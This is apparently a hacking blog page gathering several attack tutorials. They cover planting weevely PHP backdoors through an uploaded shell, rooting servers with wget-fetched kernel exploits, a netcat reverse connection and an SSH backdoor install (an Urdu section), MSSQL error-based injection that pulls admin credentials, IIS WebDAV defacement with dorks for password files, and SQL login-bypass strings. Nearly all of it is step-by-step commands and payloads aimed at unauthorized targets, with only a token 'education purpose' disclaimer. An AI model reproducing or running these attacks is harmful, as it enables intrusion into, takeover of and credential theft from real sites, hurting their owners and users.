BackDoor & Rooting With Backtrack 5





By rUsTlEs xEr0




Assalam O Alaikum All!!
Today Im going to post a tutorial Related to Backdoor Via Backtrack 5.
Now For this You need A Virtual Machine Install with Bt5.
oK.. NoW LeTs Start..
Assume our target site : http://target.com/
Now we have hacked admin panel of site via sql injection. The site was sql vulnerable (Assumption)

Admin pAnel: http://target.com/admin/index.php

After logging into the admin panel we have uploaded our shell (r57.php)
shell location on server: http://target.com/uploads/r57.php

now..
Run you Vmware >> Backtrack 5...
The game starts now..
Backdooring a server with encrypted php backdoor.. amazing!!


root@bt:~#
root@bt:~# cd /pentest/backdoors/web/weevely

Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/

Where
-p = your password to access the backdoor
-g = generate a new encrypted php file (it doesn’t actually encrypt the file, they encode it)
-o = specify your output file

root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o /root/Desktop/bdoor.php -p rustles

+ Backdoor file ‘bdoor.php ’ created with password ‘rustles".Now go and check your desktop. There will be a encrypted php file bdoor.php .

=>FireFox ---> http://target.com/uploads/r57.php ---> Upload bdoor.php
=>FireFox ---> http://target.com/uploads/bdoor.php ---> bdoor.php location

Now we have to connect to our encrypted bdoor.php


root@bt:/pentest/backdoors/web/weevely# ./main.py -t - u http://target.com/uploads/bdoor.php -p rustles

Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/

+ Using method ‘system()’.
+ Retrieving terminal basic environment variables .
[hacker@target.com/] ls
Index.php
admin
uploads
images
config.php
contact.php
Director listing Successful.

[hacker@target.com/] mkdir tmp
Directory tmp successfully created!!

[hacker@target.com/] cd tmp
[hacker@target.com/tmp] mkdir pcp

Directory pcp Successfully Created.

[hacker@target.com/tmp] cd pcp
[hacker@target.com/tmp/pcp] uname -r / -a

Linux 2.6.32 kernel (Assume)

[hacker@target.com/tmp/pcp]wget http://expoit-2.6.32.com/2.6.32.c
Downloading 2.6.32.c
File Transfer Complete -----------------100% ---------- 2.6.32.c
[hacker@target.com/tmp/pcp] ls
2.6.32.c
Directory Successfully listed.
[hacker@target.com/tmp/pcp] gcc 2.6.32.c -o hackall
-
-
done
[hacker@target.com/tmp/pcp] ./hackall
-
-

[hacker@target.com/tmp/pcp] id
uid=(root) gid=(root)
[hacker@target.com/tmp/pcp] Rooted ... Enjoy!!

Special Thnx to Hack All

[Read More...]


How To Root Server Very Detailed [Advance In Urdu]






[TUT]How To Root Server Very Detailed [Advance In Urdu]




How To Root The Server


Maqsad
Mera Name Masoom Killer Hei Aur Dangerous Hacker B Mera Name HEi Kafi Forums....
Par Me Aap Ko AAj Aik Anokhi Cheez Sekhao Ga Wo B Urdu Me
Shaid K Urdu Me Koi Aisa Tutrial Ho Lekn Mene Aaj Tak Nahe Dekha Ye Urdu Samjny Walo K Leye Me Likh Raha Hon Q K Me B Pehly
ApKi He Stage par Tha Tu Hamesha Urdu Ki Request Karta Tha Lekn Urdu Me Koi Zehmat Nahe Karta Tha Mere Abi B Comment Pary hongy
Like this" Please Urdu Me Samjao ,Its Good But Ye Tutrial Urdu Me Hona Chaye Tha" Aur Waise B Ye Tutorial English Me Bohat
Arsy SE Internet Par Aya Howa Hei Hum Paki Hei Na Is Leye Hum Ko In Chezo ka Ilm Tab Hota Hei Jab Ye Cheze Aam Ho Jati hein
Anyway Hum Apny Point Par Aty Hein...

Hum Jo Sekhy Gy Wo Beginner (Medium) Hackers K Leye Hei Jo Websit Tu Hack Kar Lety hein Yeni Shell Upload Kar Lety Hein par Pata Nahe Hota K Usko
Karna Kia hei Tu Me Aap Ko Rooting Karna Sekhaonga K kaise Root Karna Hei Server Ko

First Of All Thanks To Google.com & PCA & ABH & HF And Other Hackers Who Helped Me


Chalo G STart Karte hein

Kuch Sawalo K Jawab

1=Rooting Kia Hota Hei ??

Rooting Asal me Main Admin Tak Ponchna Yeni Is Sit Ka Admin Name Kia hei Aur Isko Bypass Kaise karte Hein Rooting Kehty hein

Asaan Alfaaz Me User Me Access Karna "Root" Kehlata hei.....

2=Hum Ko Rooting K Leye Kia Kuch Chaye?

1:-App K Paas "Shell Upload" Hona Chaye Jo Me Aap Ko Nahe Dy Sakta...
2:-App K Pass "Exploit" Hona Chaye jo K Exploit Section Me Aap Ko Mil Sakta hei...
3:-Aap K Pass "Log Cleaner" Hona Chaye Jo K Apko Mera Dost Dy Ga ( What The Hell Who is your Friend):@ Simply Google.Com...
4:-App K pass "SSH Backdoor" Hona Chaye Ye B Mere Dost K Pass He Hei G.....
5:-App K Pass "netCat" Hona Chaye Ye B Mere Dost SE He Mile Ga Yeni www. Google .Com Se....
6:-App K Pass "Putty" Software Hona Chaye Jo K Aap Ko AAp K Dost Google.com SE mily ga.....lol
7:-Aap k Pass "Brain" Hona chaye jo K Sub Se Lazmi Cheez Hei Aur Ye Na Me Dy Sakta HOn Aur Na Google Dy Sakta Hei Ye Sirf "Quraan" Dy Sakta hei....

Sub Se Pehly Hum Servers Se Back Connection Karegy

IS K Leye

Start Par Ja Kar Run Par Ja Kar Cmd Likh Kar Enter Dabana Hei Aap Ne Yeni Command Prompt Open Karna hei Pher Jaha Apny "Netcat"
Save Kiya Hei Wo Likhna hei Pher Exmple

Ap Ne NetCat ko C:// Drive Me Save Kiya Howa hei Tu Ap ne


Code:Cd C://
Pher

Code:Cd netcat

Code:Cd Netcat.Exe
Is K Baad AaP Shell Ki Taraf Ajao Aap Shell Ko Firfox Ya Kisi BRowser Me Open Karo Pher Aap Shell Me Back Connection par Click Karo
Ager Nahe Hei To Koi Shell Upload Karo Jaise "priv8.php or SyRiAn Sh3ll V7 " Ye Hein "SyRiAn Sh3ll V7 " Is The Best Shell ...
Waise Aap Ki marzi hei Jo Marzi Use Karo........

Apna Ip Adress Likho Jo K pehly He Likha Hoga Ip Bar me Pher Port Me 2121 Likhy Aur connect Par Click Kar Do Aap Is Se App Shell Ko Server Par Kar Ly gy
Pher AAp Cmd B Dy Sakty hein Server K Zarye Jis Par Shell Majood hei App Ki Choice Hei...

Ab NetCat Wali Windows Ko Open Karo Aur ye Cmd Do...

[COLOR="#00FF00"]
Code:nc -| -v -p 2121


Ye Cmd Apko Ye OutPut Dy Gi...
c:\netcat>nc -l -v -p 2121
Listning On 2121

Note:
Aap Koi B Opened Port Use Kar Sakty Hein Waise 2121 Thek Rahe Gi Q K Ye Opened Port Hei Anyway Its Your Choice....


2:-Exploit

Humne Ab Sahi Expoit Dondna Hei Jo k Hume Is Cmd Se Pata Chaly ga

Aap Shell Par Pher Chaly jaye Pher Waha type Kare

Code:#Uname -a
Aur Enter Ka Button Dabao Aap Ko Kuch Aisa Nazar Ayega

[admin@www.target.com /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux dualxeon09.ns5.999servers.com 2.6.34-194.26.1.el5 #1 SMP Tue 2011 x86_64 x86_64 x86_64 GNU/Linux

Aap Deekh Sakty Hein K Server Ka Version Karnal 2.6.34 Aur Year 2011 Hei "Its For Exmple"

Aap Ko Ab 2.6.34 2011 Exploit Chaye Jo K Aap Ko Ab Assani Se Mil Sakta hei
# PCA , or Google Ya Pher Kisi B HackForum Se Mil Sakta Hei
Nehe Tu Pher App Ko Offical Websits Se Mil Jaye Ga,,,,,.....
# Leetupload.com
# Exploit-db.com
# Packetstormsecurity.org
# Th3-0utl4ws.com


Using Of Exploit

Exploit Ko Istmaal Kaise karna hei yeni Isko Execute Kaise karna hei

Hum Ne Exploit C: Drive Me Save kar Lia Hei Lekn hum Ko Shell Par Upload Karna Hei Pher isko Compile Karne Ki Zaroorat hogi Aur
Exploit Sirf Upload Karne Se Execute Nahe Hoga Hum Ko "Shell Me TMP Directory Me Jana Hoga " Q K Tmp Hamesha Writable Directory Hoti hei Is ley Hum
Ye Cmd Type kare Gy Shell Par


Code:cd /home/websitusername/public_html/tmp Directory Mukhtlf B Ho Sakti Hei Maslan cd /home/websitusername/public_html/admin/tmp cd /home/websitusername/public_html/image/tmp Waghera Isi Tarah He Kuch Hoga


Pher Ap ne Exploit Server Par Execute Karna Hei Us K Leye


Code:Wget http :// exploitWebsite .com/ 2011-exploits / exploitname.c


Code:http: //exploitwebsite. com/ 2011-exploits/ exploitname.c
Koi WebSite Nahe Hei Is Me Ap ne Website Wo Likhni Hei Jaha Exploit Hei
Jaise Aap Exploit Download Likh Sakte Ho Aap......

Ye Cmd Deny k Baad Kuch Is Tarah Ki Screeen Hogi



Code:admin@www.target.com /home/target_usernemr/public_html/tmp]$ wget http:// exploitwebsite. com/ 2011-exploits/ exploitname.c --2011-09-22 05:12:14-- http://exploitwebsite.com/2011-exploits/exploitname.c Resolving exploitwebsite.com... 199.58.192.192 Connecting to exploitwebsite . com|199.58.192.192|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 16003(15K) [text/x-csrc] Saving to: `exploitname.c'
Note:
199.58.192.192 Ye Apka Ip Adress Hei

Ab Exploit Save Hogia Hei Humare Shelled Server par Ab Hum ne Exploit Ki Permission 777 Me Change Karni Hei....

Is K Leye Hum Cmd Dy Gy

Type


Code:Chmod 777 ExploitName.c


Ab Exploit Humare Server Par Majood Hei Aur Full Control Hei Yeni Full Permission (777) Me Hei...

Abi Khush Mat Ho.....

Ab Hum Ne Exploit Ko Compile Aur Execute Karna Hei Jo Is Cmd Se Hogi.....

Type


Code:gcc -o Exploit Exploitname.c
Ye Compile Ho Kar Exploit Save HO Jaye Ga Aik Exploit K Toor Par...

Pher Hum Ko Agla Proccess Hum Ne Exploit Ko Execute karna Hei Is Cmd Se

Type

Code:./exploit
Apko Server Jawab Dy Ga K Root Hogia hei

Ab Humko Chek Karna Hei K Ye Waqia he Root Howa hei Ya Nahe Tu Hum Ne Ye Cmd Deni Hei......

type


Code:Whoami
Ye Aapko Jawab Dy ga "root"

Kuch Is Tarah Hoga

uid=xxx(root) gid=xx(root) groups=xxx(root)



Pher Ye Type Karna Hei Full Control K Leye

Type


Code:su
Ok Done!

Chup Kar Khush Mat Ho Abi Intermition Shero Howa hei...(Joking)

3:-SSH Backdoor

Ab Hum ne BackDoors Install Karne Hei Tu Hum Ne Ye Cmd Deny Hei

Type


Code:#Wget http:/ / www. urlofbackdoor . com/ sshdoor.zip
Pher Agy Sshdoor.zip Ko Unzip Karna hei

Hum Ye Cmd Dy Gy UnZip K Leye

Type


Code:#Unzip Sshdoor.zip


PHer Extrect Hone K Bad Ye Cmd Deni hei
Type


Code:Cd Sshdoor
Pher Ye Cmd Deni Hei


Code:./run yourpass port


Yourpass Ki Jaga Aap Ne Apna Password Dena Hei Aur Port Ki Jaga Aap Ne Port Likhni Hei

Pher Aap Ne Putty Ko Open karna Hei Aur Connect Kar Dena Hei Putty K Sath ....

Ab Khush Ho Ja Jiger Jo Karna Chahta Hei Server K Sath kar Ly Ab Sever Par Tera Ful Control hei ..........lol

Bacdoor Insttaling K Leye Jo Cmd Use Hoi Hein Wo Ye hein



Code:#Wget http : // www.urlofbackdoo r. com/sshdoor.zip #Unzip Sshdoor.zip #Cd sshdoor #./run dangeroushacker 21
Thats All


MukhTlif Language Me Exploit Ko Execute Karny K Leye Aap Ye Cmd Use Kar Sakty hei


C exploit

----------------------
gcc -o exploit exploit.c
chmod +x exploit
./exploit
----------------------

Perl Exploits

---------------
perl exploit.pl
---------------

Python

------------------
python exploit.py
------------------

php

-----------------
php exploit.php
-----------------

zip

----------------
unzip exploit.zip
./run
----------------

Ager Kisi Ko Pher B Samj Na I Ho Tu Please MujSe Mat Pochye ga......


Ye Tutorial Mene Bari Mehnat Se Khud Likha Hei Aur Iska Credit K4rl Team Ko B Jata Hei Ager Koi Ghalti Hoi Ho Tu Plz Maaf Kar Dijye Ga Aur Yahan Post Kar Dijeye ga....Thnx


Just for Education Purpose !!

Special Thnx to HackALL team... :)
[Read More...]


MSSQL Injection Method of Attack



By rUsTlEs xEr0


MSSQL - injection, method of attack!
###########################


1.1 Introduction
1.2 How to ask Vulnerability page?
1.3 How to prove that the site of weakness?
1.4 How to find version / name of the DB?
1.5 How to discover the names table (table_name)?
1.6 How to discover the names of column (column_name)?
1.7 How to get data from tables that interest us (eg name, pass, email, etc.)?
1.8 Conclusion?



[1.1 Introduction]
############


This lesson will try to explain that you already know the different techniques, MSSQL-injection.
Who will have the opportunity to learn how this method is used as a favorite act to obtain information (name, password and login) or various other information through this technique.
MSSQL-injection, can be used for products that are created by well-known company Microsoft.
This type of injection, then deal with those sites that are coded in ASP / Aspks etc.

There are several types of attacks in this way:

* - Normal MSSQL SQL Injection attacks
* - MSSQL injection in Web services (SOAP injection)
* - Union with MSSQL injection attack
* - ODBC error attack the "Convert"
* - MSSQL Blind SQL Injection attacks, etc. .. 


For this will be used for writing this type of attack: 

"Attack of the ODBC error message" Convert "


[1.2 How to ask Vulnerability page? ]
############################


How to ask who Vulnerability page is easy. This can use Google services company giant.

Let's open: Google 


I write, for example: inurl: "products". "ID"
inurl: "neus.asp" menu "
inurl: "content.asp" under "
inurl: "games.asp" ID "
ETC ....( I decided some examples, you can now use the logic, for better dorks)


[1.3 How to prove that the site of weakness? ]
##################################


So we can understand very easily by adding the following ID page of high comma (,).
And in case that gives us the answer we found no error page means Vulnerability example: 


++++++++++++++++++++++++++++++++++++++
/ Microsoft Access ODBC driver /
++++++++++++++++++++++++++++++++++++++
/ Open quotation /
++++++++++++++++++++++++++++++++++++++
/ Microsoft Amos DB provider for Oracle /
++++++++++++++++++++++++++++++++++++++
/ Division by zero in /
++++++++++++++++++++++++++++++++++++++ 


These are some of the most common response is shown pages that are weaknesses in the MSSQL - injection.

Should now act as an example here, and where to put high ( '). 



For example:

--------------------------------------
http://www.localhost.com/ / news.asp? id = 100 '
-------------------------------------- 


Now we can say that the error is displayed: 

++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e14 '

Open quotation mark after the character string ") AND (Volgorde> 0) ORDER BY Volgorde '.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++ 


This page has weaknesses!


[1.4 How to find version 2.4 / DB name? ]
############################



Let the example easier to understand: 

Version: 

-------------------------------------------------- ------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (@ @ version)) --
-------------------------------------------------- ------------------ 



And we have presented an example: 

++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '

Conversion failed when converting nvarchar value 'MS SQL Server 2008 (SP1) - 10.0.2531.0 (64) 29. March 2009 10:11:52 Copyright (c) 1988-2008 Microsoft Corporation Edition (64-bit), the operating systems Windows NT 6.0 <x64> (Build 6002: Service Pack 2) (SM), a data type Int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++ 




Now go find DB_Name: 

-------------------------------------------------- -------------------
http://www.localhost.com/ /news.asp? id = 100 + or +1 = convert (int (DB_Name ()))--
-------------------------------------------------- ------------------- 


eg. 


++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '

Conversion is not EVILZONE_CREW_DB when converting nvarchar value 'to data type int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++


[1.5 How to discover the names table (table_name)] 
######################################


Because it is discovered, or simply to find the side of the table goes through this method.

For example: 


-------------------------------------------------- -------------------------------------------------- --------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 table_name from information_schema.tables)) --
-------------------------------------------------- -------------------------------------------------- -------------- 



And now there will be a mistake, such as: 

++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '

Conversion is when converting nvarchar value of users' data on the type Int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++ 



That is, in this case the table (table_name) The first is the 'Users', now find the following table:

For example: 


-------------------------------------------------- -------------------------------------------------- ------------------------------------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 table_name from table_name where information_schema.tables not ( 'Users')))--
-------------------------------------------------- -------------------------------------------------- ------------------------------------------------ 



And now an error message will appear the same and will give another table: 

++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '

Conversion is not news when converting nvarchar value 'to data type int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++ 


Another table in this case is 'news'

Now to find the table (table_name) third goes like this:

For example: 



-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 table_name from table_name where information_schema.tables not ( 'Users',' news')))--
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- --------- 



I appear to us the third table: 


++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '

Conversion is when converting nvarchar value categories' of data type int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++ 



Then the third table 'categories', and so on until you find all the tables. 

For example: 


-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 table_name from table_name where information_schema.tables not ( 'Users', 'news', 'Categories'))) --
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------------


[1.6 How to discover the names of column (column_name)]
###########################################


-If you want to column_name for users as' go:

For example: 



-------------------------------------------------- -------------------------------------------------- -----------------------------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 column_name from information_schema.columns where table_name = 'users'))--
-------------------------------------------------- -------------------------------------------------- -----------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '

Conversion failed when converting nvarchar value 'Name' to data type int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++ 


So colums name for the table (table_name) 'Users' the 'name'

Now find the column (column_name) other at the same table 'Users':

For example: 



-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 column_name from information_schema.columns where table_name = 'users' and column_name (' name')))--
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- --------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '

Conversion is not a password when converting nvarchar value 'to data type int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++ 



columnes name (column_name) the other is 'password', now go find a rotating column_name:

For example: 


-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 column_name from information_schema.columns where table_name = 'users' and column_name ( 'name', 'password'))) --
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '

Conversion failed when converting nvarchar value 'emailaddress' to data type int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++ 


Therefore, the third Colum_name 'emailaddress' and so on and on until the end, to find all of the columns (column_name)!



[1.7 How to get data that interest you (our user name, pass, email, etc.)]
################################################## ###



To do so you do not have anything to ndyshe we mentioned before.
In this section, all that needs to be done is to table (table_name), and the names of column (column_name) in their earlier results found.

In this section will be used:
Table_name = Users
Column_name = user name, password, emailaddress!

Some have now replaced the example: 



-------------------------------------------------- -----------------------------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 name from Users)) --
-------------------------------------------------- -----------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '

Conversion is not an administrator when converting nvarchar value 'to data type int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++ 


user name : Administrator

Replacing now the first column "Name" in the second column "password":

For example: 



-------------------------------------------------- -----------------------------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top password from the user 1)) --
-------------------------------------------------- -----------------------------------------

++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '

Conversion failed when converting nvarchar value '123456 'to data type int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++ 



password: administratorpassword123

Now, instead of rotating columns works the same as above:

For example: 



-------------------------------------------------- ---------------------------------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 from users emailaddress)) --
-------------------------------------------------- --------------------------------------------- 


emailaddress: king.cyborg@yahoo.com

Here then we have achieved some info on, and the name / pass and emailaddress page.

user name: Administrator
password: administratorpassword123
emailaddress: [email]king.cyborg@yahoo.com/email]


[ 1.8 Conclusion ]
############


================================================== ===========================
www.localhost.com/news.asp?id=100'
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...(@@version))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...(db_name()))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users' , 'members')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users' , 'members' , 'categories')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 column_name from information_schema.columns where table_name='Users'))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username' , 'password')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 username from Users))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 password from Users))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 emailaddress from Users))--
================================================== ===========================


Special Thnx to HackALL team
[Read More...]


WEBSITE HACKING METHOD – IIS EXPLOIT HACKING



By rUsTlEs xEr0

This Method only works on sites being hosted on Ms-IIS server. Now a days many boxes are patched so it will not work on them !!!






Steps for Xp User !




1- Click on START and click on RUN then enter the below code and then press Enter %WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}

2- A new window name “WEB FOLDER” gets open

3-Right click and click on New, Add Web Folder then enter your vulnerable website address

4- Click on Next , Next , Finish.

5- Double click on that folder to open it Now u can insert your deface page on that site by simply Copy &

Paste in that folder you deface page will be avaliable at www.site.com/your defacepagename.html Note-

Also after getting access to the website…Many websites don’t allows you to add/edit your deface page (

Because Microsoft has already fixed this vulnerability in many website ).

For windows 7 user

1- Click Start.

2- Click Computer.

3- In the following dialog click Map Network Drive.

4- On the Map Network Drive dialog, click “Connect to a Web site that you can use to store your documents and Pictures” this will pop up the “Welcome to the Add Network Location Wizard“.

 5- Click on Next.

 6 – Click on ”Choose a custom network location”.

 7- Click on Next.

8- Now type the web folder address that you want to access.

 9- Enter a NAME to help you identify the web folder and click Next.

10- Place a checkmark on ‘Open this network location when I click finish‘.

 11- Click Finish.

12- To open the web folder next time, just double click on the one you want to open from the My Network Places list. Note:- Remeber Some sites you might get an error while uploading xyz.html file that time just change the extension to xyz.htm and you can also deface some of the websites using Shell.

Dork- “Powered by IIS” or use your own unique dork.


or u can use these dorks



IIs Dorks...!!
intext:"404 Object Not Found" Microsoft-IIS/5.0
"Microsoft-IIS/* server at" intitle:index.of
"Microsoft-IIS/4.0" intitle:index.of
"Microsoft-IIS/5.0 server at"
intitle:"Welcome to IIS 4.0"
intitle:"Welcome to Windows 2000 Internet Services"


for secret info:


filetype:ini "Bootstrap.php" (pass|passwd|password|pwd)
filetype:php~ (pass|passwd|password|dbpass|db_pass|pwd)


[Read More...]


How to hack website using sql injection



By rUsTlEs xEr0


what is sql injection?

SQL Injections or simply called Structured Query Language Injection is a technique that exploits the loop hole in the database layer of the application. This happens when user mistakenly or purposely(hackers) enters the special escape characters into the username password authentication form or in URL of the website. Its called the coding standard loop hole. some website owners doesn't have proper knowledge of secure coding standards and that results into the vulnerable websites. Now assume , you opened a website and went to his Sign in or log in page. Now in username field you have entered something say yogesh and in the password box you pass some escape characters like ',",1=1, etc... Now if the website owner hasn't handled null character strings or escape characters then user will surely get something else that owner never want their users to view.. This is basically called Blind SQL. 

Some basic requirements for sql injection:
1) you need a web browser to open URL and to view source codes.
2) you need notepad++.
3) and very basic  queries of sql like insert , select , update , delete etc.

First of all you can hack those website using SQL injection hacks that allows some input fields from the visitor which can provide input to website like log in page , search page, feedback page etc.
Now a days , HTML pages use POST command to send parameter to another ASP/ASPX page.
Therefore, you may not see the parameter in the URL. You can check the source code of the HTML, and look for "FROM" tag in the HTML code. You may find something like this in some HTML codes:

<F O R M action=login.aspx method=post>
<I N P UT type=hidden name=user v a l u e=xyz>
< / F O R M>


Everything between the < F O R M > and < / F O R M > parameters(remove space in words) contains the crucial information and can help us to determine things in more detailed way.



There is alternate method for finding vulnerable website, the websites which have extension ASP, ASPX, JSP, CGI or PHP try to look for the URL's in which parameters are passed. Example is shown below:


http://example.com/login.asp?id=10 



Now how to detect that this URL is vulnerable or not:
Start with single quote trick, take sample parameter as hi'or1=1--. Now in the above URL id is the parameter and 10 is its value. So when we pass hi'or1=1-- as parameter the URL will look like this:

http://example.com/login.asp?id=hi' or 1=1--




You can also do this with hidden field, for that you need to save the webpage and had to made changes to URL and parameters field and modify it accordingly. For example: 
< F O R M action=http://example.com/login. asp method=p o s t >
< i n p u t  type=hidden name=abc value="hi' or 1=1--">
< / F O R M >

 If your luck is favoring you, you will get the login into the website without any username or password.

                                 
But why ' or 1=1-- ?
Take an asp page that will link you to another page with the following URL:

http://example.com/search.asp?category=sports
In this URL 'category' is the variable name and 'sports' is it's value.

Here this request fires following query on the database in background.
SELECT * FROM TABLE-NAME WHERE category='sports'
Where 'TABLE-NAME' is the name of table which is already present in some database.
So, this query returns all the possible entries from table 'search' which comes under the category 'sports'.

Now, assume that we change the URL into something like this:
http://example.com/search.asp?category=sports' or 1=1--

Now, our variable 'category' equals to "sports' or 1=1-- ", which fires SQL query on database something like: SELECT * FROM search WHERE category='sports' or 1=1--'
 
The query should now select everything from the 'search' table regardless if category is equal to 'sports' or not.
A double dash "--" tell MS SQL server to ignore the rest of the query, which will get rid of the last hanging single quote (').
Sometimes, it may be possible to replace double dash with single hash "#".

However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try

' or 'a'='a
 
It should return the same result.
Depending on the actual SQL query, you may have to try some of these possibilities:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
'or''='

[Read More...]


 

Popular Posts

Recent Comments

free counters
Return to top of page Copyright © 2010 | Platinum Theme Converted into Blogger Template by rUsTlEs xEr0